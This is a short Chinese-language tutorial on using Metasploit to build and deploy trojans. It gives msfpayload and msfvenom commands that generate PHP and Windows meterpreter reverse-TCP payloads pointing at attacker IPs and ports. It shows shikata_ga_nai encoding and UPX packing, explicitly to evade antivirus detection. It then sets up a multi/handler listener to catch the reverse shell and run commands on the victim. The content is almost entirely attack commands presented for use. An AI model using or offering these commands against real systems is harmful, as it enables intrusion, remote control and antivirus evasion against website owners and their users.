Meatsploi之生成webshell及应用
1.终端:生成木马,将生成的脚本上传到网站
msfpayload php/meterpreter/reverse_tcp LHOST=192.168.43.80 R >php.exe //生成一个PHP脚本木马 cat //查看文件内容
现在怎么生成PHP木马还不太清楚
- 更新了kali了,现在已经没有msfpayload的命令了,换成msfvenom了。里面集成了msfpayload和msfencode
kali2.0之后的可以使用以下命令
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=192.168.1.113 LPORT=443 -f exe > abc.exe // -p payload -e 编码方式 -i 编码次数 -b 在生成的程序中避免出现的值 LHOST,LPORT 监听上线的主机IP和端口 -f exe 生成EXE格式
还可以使用UPX加壳,做免杀处理,命令如下
upx -5 /root/Desktop/acn.exe
2.做一个反弹会话的一个链接
use exploit/multi/handler set LHOST 192.168.43.80 set LPORT 55555 show options exploit
完成一系列设置之后生成一个等待状态的会话,一旦木马被触发,即可获得会话
3.开始你的表演
shell execute -f notepad ......